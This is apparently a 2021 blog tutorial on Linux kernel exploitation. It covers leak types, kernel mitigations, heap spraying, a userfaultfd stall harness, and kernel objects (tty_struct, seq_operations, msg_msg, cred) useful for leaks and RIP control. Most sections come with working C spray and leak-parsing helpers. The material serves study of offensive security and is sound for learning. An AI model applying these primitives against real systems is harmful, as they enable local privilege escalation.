Small steps into kernel exploitation

June 23, 2021 // echel0n

One small step for the world, one giant leap for the vulnerability researcher


When someone figures out how to take advantage of a bug, it becomes a security issue. If you have found a bug in kernel land and are trying to figure out what to do next, this post may help you along the way.

From "Stairway to Successful Kernel Exploitation" by Enrico Perla and Massimiliano Oldani: to develop a good exploit, we must understand the vulnerability we are targeting, the kernel subsystems involved, and the techniques we are using.

First things first, a good exploit is one that is:
* Reliable
* Safe
* Effective

* The list of preconditions that must be met for the exploit to work must be narrowed down as much as possible.
* The parts of the exploit that might crash the machine must be identified.
* The exploit must leave the machine in a stable state.
* Although it is not a must, the exploit should be portable, which means it should work on as many targets as possible.

Back to the subject. From a security point of view, the question is: "What kind of advantages are we looking for?"

Identifying Advantages

We are looking for:
* Memory leaks
* Stack addresses/values
* Heap addresses/values
* Kernel data segment
* Arbitrary Read/Write
* RIP Control

Stack Leak

* Stack addresses/values are a very useful type of leak, because there may be no other way to know where the stack is. If the leak is large enough, it can also reveal the stack canary and its value. Since a task's kernel stack is allocated once and stays in the same place for the lifetime of that task, this leak is very powerful.

Heap Leak
* The generic case of a heap leak is the ability to leak memory around an object, either before or after it. Such a leak may expose information about the state of the previous/next object.
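When a stack or heap leak hands you a buffer of raw 8-byte values, the first job is sorting them. The following is a minimal, heuristic sketch assuming x86_64 with 4-level paging. The enum and function names are hypothetical. Two facts drive it. First, the kernel image is mapped between 0xffffffff80000000 and 0xffffffffc0000000, and the rest of the canonical kernel half holds heap (direct map), vmalloc'ed stacks, modules and so on. Second, as far as I know, 64-bit little-endian kernels clear the lowest byte of the stack canary (`CANARY_MASK`). A random canary is therefore almost always non-canonical with a zero low byte.

```c
#include <stdint.h>

/* Hypothetical categories for one leaked qword (x86_64, 4-level paging assumed). */
enum leak_kind {
    LEAK_OTHER,
    LEAK_KERNEL_IMAGE,     /* kernel text/data: useful for the kernel base */
    LEAK_KERNEL_OTHER,     /* heap (direct map), vmalloc, stacks, modules... */
    LEAK_CANARY_CANDIDATE  /* looks like a 64-bit kernel stack canary */
};

enum leak_kind classify_leak(uint64_t v)
{
    /* The kernel image lives in this 1 GiB window, with or without KASLR. */
    if (v >= 0xffffffff80000000ULL && v < 0xffffffffc0000000ULL)
        return LEAK_KERNEL_IMAGE;
    /* Any other canonical kernel-half address. */
    if (v >= 0xffff800000000000ULL)
        return LEAK_KERNEL_OTHER;
    /* Non-canonical (neither user nor kernel half) with a zero low byte:
       heuristic match for a random canary whose lowest byte was masked off. */
    if (v >= 0x0000800000000000ULL && (v & 0xff) == 0)
        return LEAK_CANARY_CANDIDATE;
    /* User pointers, small integers, flags, etc. */
    return LEAK_OTHER;
}
```

Running it over every qword of a leaked dump quickly shows which offsets hold kernel image pointers, heap pointers and a likely canary. Treat the canary result as a candidate only, because arbitrary data can match it too.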

Kernel Data Segment Leak
* The data segment of the kernel is created at compile time. If any leak occurs in this segment, it may expose the value of some kernel configuration or reveal some kernel symbols. Even if you can't do that, the layout is fixed at compile time, so the distance between a leaked pointer and the kernel base is the same on every boot of the same build. A single leaked pointer therefore gives you a precise offset to use in later steps of your exploit. Although a leak from here is convenient, it is not the only information that will make your exploit reliable: it helps in the triggering steps of your exploit, but not in the earlier stages.
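Turning such a leak into the kernel base is a single subtraction. Below is a minimal sketch with two assumptions. First, `offset_from_base` (the leaked symbol's distance from `_text`) comes from the same build's System.map or vmlinux. Second, the target is x86_64 with the default `CONFIG_PHYSICAL_ALIGN` of 2 MiB, which KASLR uses as the granularity for the kernel's virtual slide. The helper names and the sample numbers are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumption: default CONFIG_PHYSICAL_ALIGN (2 MiB) on x86_64. */
#define KASLR_ALIGN 0x200000ULL

/* base = leaked pointer - (symbol address - _text) taken from the same build */
uint64_t kernel_base_from_leak(uint64_t leaked, uint64_t offset_from_base)
{
    return leaked - offset_from_base;
}

/* Sanity check: inside the kernel image window and aligned like a KASLR slide. */
bool plausible_kernel_base(uint64_t base)
{
    return base >= 0xffffffff80000000ULL &&
           base <  0xffffffffc0000000ULL &&
           (base & (KASLR_ALIGN - 1)) == 0;
}
```

For example, a leaked pointer 0xffffffff9a2c1f40 with a known offset of 0x12c1f40 gives a base of 0xffffffff99000000, which passes the alignment check. A misaligned result usually means the offset belongs to a different build.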

Arbitrary Write
* We need to be able to push our intentions into the kernel as much as we pull information out of it. Using the information gathered from leaks, we need to push some data into kernel land with the intention of making the kernel do something unintended. To do so, we need to find a memory area that is under our control. In most cases we are limited in the amount of space we can use, so be careful about the size of your payload and be sure about where it will land. Arbitrary read/write can occur in scenarios like these:

* Buffer copy without checking size of input (Buffer overflow)
* Buffer Underflow
* Write-what-where condition
* Incorrect calculation of buffer size
* Access of memory location before start/after end of buffer
* Buffer access with incorrect length value
* Free of memory not on the Heap
* Double free
* Use after free
* Race conditions

Kernel Mitigations

It is also worth mentioning that, when you try to take advantage of a bug, you will be restricted by the Linux kernel's mitigation features, just like with userland mitigations. A few of them are:

* Kernel stack cookies: Exactly the same as stack canaries in userland.
* Kernel address space layout randomization (KASLR): Like ASLR in userland. It randomizes the kernel base address each time the system boots.
* Supervisor mode execution prevention (SMEP): While the CPU runs in kernel mode, it refuses to execute code from userland pages, as if all of them were marked NX.
* Supervisor mode access prevention (SMAP): While the CPU runs in kernel mode, it refuses to read or write userland pages, except in windows the kernel opens on purpose (with the stac/clac instructions around functions such as copy_from_user()).
* Kernel page-table isolation (KPTI): The kernel keeps separate page tables for user mode and kernel mode. The user-mode page table contains only a minimal set of kernel addresses, which minimizes the exposed surface.
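Before choosing a technique, it helps to check which of these mitigations are active on the target. The following is a minimal sketch assuming x86_64, where the `flags` line of /proc/cpuinfo lists `smep` and `smap` when the CPU supports them and the kernel has not disabled them at boot, and lists `pti` when KPTI is enabled. The helper names are hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* True if `word` appears in `line` as a whole whitespace-separated token. */
bool has_word(const char *line, const char *word)
{
    size_t n = strlen(word);
    const char *p = line;
    if (n == 0)
        return false;
    while ((p = strstr(p, word)) != NULL) {
        bool start_ok = (p == line) || p[-1] == ' ' || p[-1] == '\t';
        char end = p[n];
        bool end_ok = end == '\0' || end == ' ' || end == '\t' || end == '\n';
        if (start_ok && end_ok)
            return true;
        p += n;  /* partial match such as "smepx": keep searching */
    }
    return false;
}

/* 1 if the first "flags" line of /proc/cpuinfo contains `flag`, 0 if not,
   -1 if /proc/cpuinfo cannot be read. */
int cpu_has_flag(const char *flag)
{
    char line[8192];
    int found = 0;
    FILE *f = fopen("/proc/cpuinfo", "r");
    if (!f)
        return -1;
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "flags", 5) == 0) {
            found = has_word(line, flag);
            break;
        }
    }
    fclose(f);
    return found;
}
```

Calling `cpu_has_flag("smep")`, `cpu_has_flag("smap")` and `cpu_has_flag("pti")` covers three of the mitigations above. For KASLR, looking for `nokaslr` in /proc/cmdline is the usual quick check.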

Heap Spraying (how/why)

As noted above, we need reliability, and it often depends on the order and alignment of memory. Memory alignment and the state of the operating system introduce a lot of randomness when we are dealing with a bug. The common ways to deal with this chaos are placing a lot of NOPs (a NOP sled) or allocating a lot of memory. Allocating a large amount of memory is called heap spraying. A heap spray can compensate for this chaos and increase the chances of successful exploitation. Also, the start location of a large heap allocation is more predictable, and consecutive allocations are approximately sequential, so the sprayed data tends to end up in a predictable location each time the spray is run.

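    // Simple heap spraying example: every open() of /dev/ptmx allocates a tty_struct
    #include <fcntl.h>
    #include <unistd.h>

    int ptmx[0x100];
    for (int i = 0; i < 0x100; ++i)
        ptmx[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY); // reserve tty_struct
    for (int i = 0; i < 0x100; ++i)
        close(ptmx[i]);                                 // release them again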

Depending on which mitigations are enabled and which vulnerable driver functions are available, the way to take advantage of a bug changes. Let's say you have found a bug that causes a "Use After Free", but the size you can allocate is fixed. Then you need to find "usable" kernel objects whose size matches your allocation size. Before looking for usable objects, let's take a look at which conditions are ideal, as explained by Vitaly Nikolenko in his "Linux Kernel universal heap spray" blog post.
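"Matching size" really means "lands in the same slab cache", because kmalloc rounds every request up to a size class. The following is a minimal sketch of that rounding, assuming SLUB on x86_64 with the default generic caches (including kmalloc-96 and kmalloc-192). It ignores the separate kmalloc-cg-* caches that newer kernels use for accounted (GFP_KERNEL_ACCOUNT) allocations. The helper name is hypothetical.

```c
#include <stddef.h>

/* N of the generic kmalloc-N cache a `size`-byte request lands in,
   or 0 for size 0 and for sizes above 8192 (served by the page allocator). */
size_t kmalloc_cache_size(size_t size)
{
    static const size_t classes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };
    if (size == 0)
        return 0;
    for (size_t i = 0; i < sizeof classes / sizeof classes[0]; i++)
        if (size <= classes[i])
            return classes[i];
    return 0;
}
```

Two objects can only replace each other after a free when this function returns the same value for both, for example 0x20 and 0x18 both map to kmalloc-32.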

Ideal conditions for universal heap spray
  1. Object size is controlled by the user.
  2. No restrictions even for very small objects (kmalloc-8)
  3. Object content is controlled by the user.
  4. No uncontrolled header at the beginning of the object.
  5. The target object should "stay" in the kernel during the exploitation stage.

For the first four conditions, we need a kmalloc -> kfree execution path where both the allocation size and its contents come from user space. setxattr is one way to do that. However, setxattr frees its buffer before returning, so for the last condition we need to hold the object in memory while our code is running. One way to hold that object is userfaultfd.
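A single setxattr() spray step might look like the sketch below. It assumes the 5.x-era path in fs/xattr.c, where the kernel looks up `path`, kvmalloc()s `size` bytes (at most XATTR_SIZE_MAX), copies `buf` from user space, calls vfs_setxattr() and kvfree()s the buffer before returning. The helper name and the "user.spray" attribute name are hypothetical.

```c
#include <stddef.h>
#include <sys/xattr.h>

/* One spray step: the kernel allocates `size` bytes, fills them with `buf`,
   then frees them. As far as I can tell the allocation and copy happen before
   the attribute is validated, so even a failing call (e.g. no user xattr
   support) has already done the spray; only a bad path fails earlier. */
int setxattr_spray_once(const char *path, const void *buf, size_t size)
{
    return setxattr(path, "user.spray", buf, size, 0);
}
```

To keep the object alive instead of having it freed immediately, `buf` is typically placed so that its last bytes fall into a userfaultfd-registered page. The kernel's copy_from_user() then stalls halfway through the copy, with the first part of the object already written.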

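The idea behind userfaultfd is to handle page faults in user space. Normally, the first access to a page of an mmap() region that has not been populated yet triggers a page fault that the kernel resolves on its own. If that region is registered with userfaultfd, the fault is instead reported to user space, where a separate thread decides when, and with which data, to resolve it. If the access comes from the kernel (for example copy_from_user() inside a system call), that kernel code path stays stalled in the middle of the system call until our handler responds. This is what keeps the target object in memory.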

The catch is that the thread that triggered the fault stays suspended while the fault is handled in the separate thread. No worries: the rest of the exploit can be driven from a second thread or a forked process.

    // Here is an example of how you can set up a page fault handler:
    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <linux/userfaultfd.h>
    #include <poll.h>
    #include <pthread.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    #define errexit(msg)        \
        do {                    \
            perror(msg);        \
            exit(EXIT_FAILURE); \
        } while (0)

    void *fault_handler_thread(void *arg) {
        struct uffd_msg msg;
        struct uffdio_copy copy;
        static char *page = NULL;   // source page used to resolve faults
        long uffd = (long)arg;
        int page_size = sysconf(_SC_PAGE_SIZE);
        ssize_t len;

        if (page == NULL) {
            page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (page == MAP_FAILED)
                errexit("mmap (userfaultfd)");
        }

        for (;;) {
            struct pollfd pollfd;
            pollfd.fd = uffd;
            pollfd.events = POLLIN;
            // wait until a page fault is reported
            int nready = poll(&pollfd, 1, -1);
            if (nready == -1)
                errexit("poll");
            printf("[+] fault_handler_thread():\n");
            printf("poll() returns: nready = %d; POLLIN = %d; POLLERR = %d\n",
                   nready, (pollfd.revents & POLLIN) != 0,
                   (pollfd.revents & POLLERR) != 0);
            len = read(uffd, &msg, sizeof(msg));
            if (len == 0)
                errexit("userfaultfd EOF");
            if (len == -1)
                errexit("read");
            if (msg.event != UFFD_EVENT_PAGEFAULT)
                errexit("msg.event");
            printf("[+] UFFD_EVENT_PAGEFAULT event:\n");
            printf("    flags   = 0x%llx\n", (unsigned long long)msg.arg.pagefault.flags);
            printf("    address = 0x%llx\n", (unsigned long long)msg.arg.pagefault.address);
            // The faulting thread is stalled at this point: this is the window
            // in which an exploit frees or replaces its target object. Fill
            // `page` with the data that should appear at the faulting address.
            copy.src = (unsigned long)page;
            copy.dst = (unsigned long)msg.arg.pagefault.address &
                       ~(unsigned long)(page_size - 1);
            copy.len = page_size;
            copy.mode = 0;
            copy.copy = 0;
            if (ioctl(uffd, UFFDIO_COPY, &copy) == -1)
                errexit("ioctl: UFFDIO_COPY");
            printf("[+] uffdio_copy.copy = %lld\n", (long long)copy.copy);
        }
    }
    // Then register the region and start the handler thread like this:
    void setup_pagefault(void *addr, unsigned size) {
        long uffd;
        pthread_t th;
        struct uffdio_api api;
        struct uffdio_register reg;
        int s;
        // create a new userfaultfd object
        uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
        if (uffd == -1)
            errexit("userfaultfd");
        // enable the uffd object (API handshake)
        api.api = UFFD_API;
        api.features = 0;
        if (ioctl(uffd, UFFDIO_API, &api) == -1)
            errexit("ioctl: UFFDIO_API");
        // register the memory range and report faults on missing pages
        reg.range.start = (unsigned long)addr;
        reg.range.len = size;
        reg.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd, UFFDIO_REGISTER, &reg) == -1)
            errexit("ioctl: UFFDIO_REGISTER");
        // monitor page faults in a separate thread
        s = pthread_create(&th, NULL, fault_handler_thread, (void *)uffd);
        if (s != 0)
            errexit("pthread_create");
    }
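    // Calling part
    int main(void) {
        // Allocate memory for userfaultfd at a fixed address
        void *pages = mmap((void *)0x77770000, 0x4000, PROT_READ | PROT_WRITE,
                           MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if ((unsigned long)pages != 0x77770000)
            errexit("mmap (0x77770000)");
        setup_pagefault(pages, 0x4000);
        // From now on, the first access to each page of `pages` (from user space
        // or from a system call's copy_from_user/copy_to_user) is resolved by
        // fault_handler_thread.
        return 0;
    }
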
Useful Kernel Objects

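As mentioned earlier, if the size of memory that you can allocate is fixed, you need to find "usable" kernel objects whose size matches your allocation size. Below are some objects, usable depending on your needs, that ptr-yudai found and briefly explained (the link to the original blog post is at the bottom of the page). For each object, "Base" tells whether it can leak a kernel image address (and therefore the kernel base). "Heap" and "Stack" tell whether it can leak heap or stack addresses, and "RIP" tells whether it can be used to take control of the instruction pointer.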

(ptr-yudai's list is very informative and well explained in his blog, but I would like to expand it if there are new structures that could be useful. The problem is that I am not experienced enough to search for these things yet; I will study and see what I can do. From here on, the content is translated from ptr-yudai's blog and cross-checked against the Linux source code. I will work on it later.)

Structures that can be used for leaks, arbitrary read/write, or RIP control:

* shm_file_data
* seq_operations
* msg_msg (+ user-supplied data)
* subprocess_info
* cred
* file
* timerfd_ctx
* tty_struct

Structures that can be used for arbitrary write / heap spraying:

* msg_msg
* setxattr
* sendmsg

Defined in shm.c
    struct shm_file_data {
        int id;
        struct ipc_namespace *ns;
        struct file *file;
        const struct vm_operations_struct *vm_ops;
    };

Size: 0x20 (kmalloc-32)
Base: *ns and *vm_ops point to the kernel data area, so a leak is possible.
Heap: Can leak, because *file points to the heap area.
RIP: No.
Allocation: Attach shared memory with shmat

Defined in seq_file.h
    struct seq_operations {
        void * (*start) (struct seq_file *m, loff_t *pos);
        void (*stop) (struct seq_file *m, void *v);
        void * (*next) (struct seq_file *m, void *v, loff_t *pos);
        int (*show) (struct seq_file *m, void *v);
    };

Size: 0x20 (kmalloc-32)
Base: Can leak 4 function pointers
Heap: No
Stack: No
RIP: Possible
Allocation: Open a file that uses single_open (e.g. /proc/self/stat)
Release: Close that file
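Allocation and release map directly onto open() and close(). The following is a minimal sketch assuming that /proc/self/stat is opened through single_open(), which kmallocs one struct seq_operations per open file. The helper name is hypothetical.

```c
#include <fcntl.h>
#include <unistd.h>

/* Open /proc/self/stat `n` times: one seq_operations (kmalloc-32) each.
   Returns how many descriptors were opened. */
int spray_seq_operations(int *fds, int n)
{
    for (int i = 0; i < n; i++) {
        fds[i] = open("/proc/self/stat", O_RDONLY);
        if (fds[i] < 0)
            return i;
    }
    return n;
}
```

If one of these objects is overwritten, a read() on the matching descriptor goes through `start`, which is the RIP control path listed above. Closing a descriptor frees its object.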

Defined in msg.h
    struct msg_msg {
        struct list_head m_list;
        long m_type;
        size_t m_ts; /* message text size */
        struct msg_msgseg *next;
        void *security;
        /* the actual message follows immediately */
    };

Size: Various (0x31 to 0x1000 / kmalloc-64 and above)
Base: No
Heap: Can leak, because m_list.next/m_list.prev point to the neighbouring messages in the same queue (next points to the continuation segment of a large message).
Stack: No
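msg_msg is allocated with msgsnd() and released with msgrcv(). The following is a minimal sketch assuming x86_64, where the header shown above is 0x30 bytes. Under that assumption, a 0x10-byte text produces a 0x40-byte object in kmalloc-64. The struct name and the 0x100 text cap are hypothetical choices for this sketch.

```c
#include <stddef.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define MSG_MSG_HDR    0x30   /* sizeof(struct msg_msg) on x86_64 */
#define SPRAY_TEXT_MAX 0x100  /* hypothetical cap for this sketch */

struct spray_msg {
    long mtype;                  /* must be > 0 */
    char mtext[SPRAY_TEXT_MAX];
};

/* Queue one message; the kernel copy is a msg_msg of MSG_MSG_HDR + len bytes. */
int send_msg_msg(int qid, const void *data, size_t len)
{
    struct spray_msg m = { .mtype = 1 };
    if (len > SPRAY_TEXT_MAX)
        return -1;
    memcpy(m.mtext, data, len);
    /* IPC_NOWAIT: fail with EAGAIN instead of blocking when the queue is full. */
    return msgsnd(qid, &m, len, IPC_NOWAIT);
}
```

A queue holds 16384 bytes by default (MSGMNB), so a larger spray is usually spread across several queues from msgget(IPC_PRIVATE, IPC_CREAT | 0600). Receiving a message with msgrcv() frees its msg_msg.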


Defined in umh.h
    struct subprocess_info {
        struct work_struct work;
        struct completion *complete;
        const char *path;
        char **argv;
        char **envp;
        struct file *file;
        int wait;
        int retval;
        pid_t pid;
        int (*init)(struct subprocess_info *info, struct cred *new);
        void (*cleanup)(struct subprocess_info *info);
        void *data;
    } __randomize_layout;

Size: 0x60 (kmalloc-128)
Base: work.func points to call_usermodehelper_exec_work, so a leak is possible.
Heap: Possible
Stack: No
RIP: Possible by overwriting cleanup in a race condition.

Defined in cred.h
    struct cred {
        atomic_t usage;
    #ifdef CONFIG_DEBUG_CREDENTIALS
        atomic_t subscribers; /* number of processes subscribed */
        void *put_addr;
        unsigned magic;
    #define CRED_MAGIC 0x43736564
    #define CRED_MAGIC_DEAD 0x44656144
    #endif
        kuid_t uid;   /* real UID of the task */
        kgid_t gid;   /* real GID of the task */
        kuid_t suid;  /* saved UID of the task */
        kgid_t sgid;  /* saved GID of the task */
        kuid_t euid;  /* effective UID of the task */
        kgid_t egid;  /* effective GID of the task */
        kuid_t fsuid; /* UID for VFS ops */
        kgid_t fsgid; /* GID for VFS ops */
        unsigned securebits;          /* SUID-less security management */
        kernel_cap_t cap_inheritable; /* caps our children can inherit */
        kernel_cap_t cap_permitted;   /* caps we're permitted */
        kernel_cap_t cap_effective;   /* caps we can actually use */
        kernel_cap_t cap_bset;        /* capability bounding set */
        kernel_cap_t cap_ambient;     /* Ambient capability set */
    #ifdef CONFIG_KEYS
        unsigned char jit_keyring;          /* default keyring to attach requested
                                             * keys to */
        struct key __rcu *session_keyring;  /* keyring inherited over fork */
        struct key *process_keyring;        /* keyring private to this process */
        struct key *thread_keyring;         /* keyring private to this thread */
        struct key *request_key_auth;       /* assumed request_key authority */
    #endif
    #ifdef CONFIG_SECURITY
        void *security; /* subjective LSM security */
    #endif
        struct user_struct *user;       /* real user ID subscription */
        struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
        struct group_info *group_info;  /* supplementary groups for euid/fsgid */
        /* RCU deletion */
        union {
            int non_rcu;         /* Can we skip RCU deletion? */
            struct rcu_head rcu; /* RCU deletion hook */
        };
    } __randomize_layout;

Size: 0xa8 (kmalloc-192)
Base: No
Heap: Possible through session_keyring
Stack: No

Defined in fs.h
    struct file {
        union {
            struct llist_node fu_llist;
            struct rcu_head fu_rcuhead;
        } f_u;
        struct path f_path;
        struct inode *f_inode; /* cached value */
        const struct file_operations *f_op;
        /*
         * Protects f_ep_links, f_flags.
         * Must not be taken from IRQ context.
         */
        spinlock_t f_lock;
        enum rw_hint f_write_hint;
        atomic_long_t f_count;
        unsigned int f_flags;
        fmode_t f_mode;
        struct mutex f_pos_lock;
        loff_t f_pos;
        struct fown_struct f_owner;
        const struct cred *f_cred;
        struct file_ra_state f_ra;
        u64 f_version;
    #ifdef CONFIG_SECURITY
        void *f_security;
    #endif
        /* needed for tty driver, and maybe others */
        void *private_data;
    #ifdef CONFIG_EPOLL
        /* Used by fs/eventpoll.c to link all the hooks to this file */
        struct list_head f_ep_links;
        struct list_head f_tfile_llink;
    #endif /* #ifdef CONFIG_EPOLL */
        struct address_space *f_mapping;
        errseq_t f_wb_err;
    } __randomize_layout
      __attribute__((aligned(4))); /* lest something weird decides that 2 is OK */

Size: (kmalloc-256)
Base: f_op points to the kernel's data area, so a leak is possible.
Heap: ?
Stack: ?
Allocation: Create shared memory with shmget
Release: Discard with shmctl
Note: RIP control is possible if you can overwrite f_op and then call shmctl.

Defined in timerfd.c
    struct timerfd_ctx {
        union {
            struct hrtimer tmr;
            struct alarm alarm;
        } t;
        ktime_t tintv;
        ktime_t moffs;
        wait_queue_head_t wqh;
        u64 ticks;
        int clockid;
        short unsigned expired;
        short unsigned settime_flags; /* to show in fdinfo */
        struct rcu_head rcu;
        struct list_head clist;
        spinlock_t cancel_lock;
        bool might_cancel;
    };

Size: (kmalloc-256)
Base: tmr.function points to timerfd_tmrproc so it's possible.
Heap: Can leak (from tmr.base)
Stack: No

Defined in tty.h
    struct tty_struct {
        int magic;
        struct kref kref;
        struct device *dev;
        struct tty_driver *driver;
        const struct tty_operations *ops;
        int index;
        /* Protects ldisc changes: Lock tty not pty */
        struct ld_semaphore ldisc_sem;
        struct tty_ldisc *ldisc;
        struct mutex atomic_write_lock;
        struct mutex legacy_mutex;
        struct mutex throttle_mutex;
        struct rw_semaphore termios_rwsem;
        struct mutex winsize_mutex;
        spinlock_t ctrl_lock;
        spinlock_t flow_lock;
        /* Termios values are protected by the termios rwsem */
        struct ktermios termios, termios_locked;
        struct termiox *termiox; /* May be NULL for unsupported */
        char name[64];
        struct pid *pgrp; /* Protected by ctrl lock */
        struct pid *session;
        unsigned long flags;
        int count;
        struct winsize winsize; /* winsize_mutex */
        unsigned long stopped:1, /* flow_lock */
                      flow_stopped:1,
                      unused:BITS_PER_LONG - 2;
        int hw_stopped;
        unsigned long ctrl_status:8, /* ctrl_lock */
                      packet:1,
                      unused_ctrl:BITS_PER_LONG - 9;
        unsigned int receive_room; /* Bytes free for queue */
        int flow_change;
        struct tty_struct *link;
        struct fasync_struct *fasync;
        wait_queue_head_t write_wait;
        wait_queue_head_t read_wait;
        struct work_struct hangup_work;
        void *disc_data;
        void *driver_data;
        spinlock_t files_lock; /* protects tty_files list */
        struct list_head tty_files;
    #define N_TTY_BUF_SIZE 4096
        int closing;
        unsigned char *write_buf;
        int write_cnt;
        /* If the tty has a pending do_SAK, queue it here - akpm */
        struct work_struct SAK_work;
        struct tty_port *port;
    } __randomize_layout;

Size: 0x2e0 (kmalloc-1024)
Base: *ops points to ptm_unix98_ops so it's possible.
Heap: Various leaks are possible
Stack: No
Allocation: Open /dev/ptmx
Release: Close /dev/ptmx
RIP: RIP can be controlled by rewriting *ops
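After spraying /dev/ptmx, a read primitive on the freed slot should show a tty_struct, and the magic field makes that easy to confirm. The following is a minimal sketch based on three assumptions. The layout matches the listing above with `__randomize_layout` not in effect, on x86_64, which puts `magic` at 0x0 and `ops` at 0x18. The target kernel still has the `magic` field. TTY_MAGIC is 0x5401. The helper name is hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TTY_MAGIC      0x5401
#define TTY_OPS_OFFSET 0x18  /* magic @0x0, kref @0x4, dev @0x8, driver @0x10 */

/* If `leak` starts with a tty_struct, store its ops pointer and return true. */
bool parse_tty_struct(const unsigned char *leak, size_t len, uint64_t *ops_out)
{
    int32_t magic;
    if (len < TTY_OPS_OFFSET + sizeof(uint64_t))
        return false;
    memcpy(&magic, leak, sizeof magic);
    if (magic != TTY_MAGIC)
        return false;
    memcpy(ops_out, leak + TTY_OPS_OFFSET, sizeof *ops_out);
    return true;
}
```

For a master opened from /dev/ptmx, the recovered ops pointer is ptm_unix98_ops. Subtracting that symbol's offset from the same build gives the kernel base.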

Heap Spraying

(msg_msg: already mentioned.)

setxattr
Size: Various (<=65535)
Reserve: Call with the pointer and size
Notes: Use with userfaultfd (First 48 bytes cannot be written)

sendmsg
Size: Various(>=2)
Reserve: Call with the pointer and size
Notes: Combine with userfaultfd


References

* Stairway to Successful Kernel Exploitation, book chapter 3 (Enrico Perla, Massimiliano Oldani)

Thank you for reading my blog! Have a nice day absolute legends!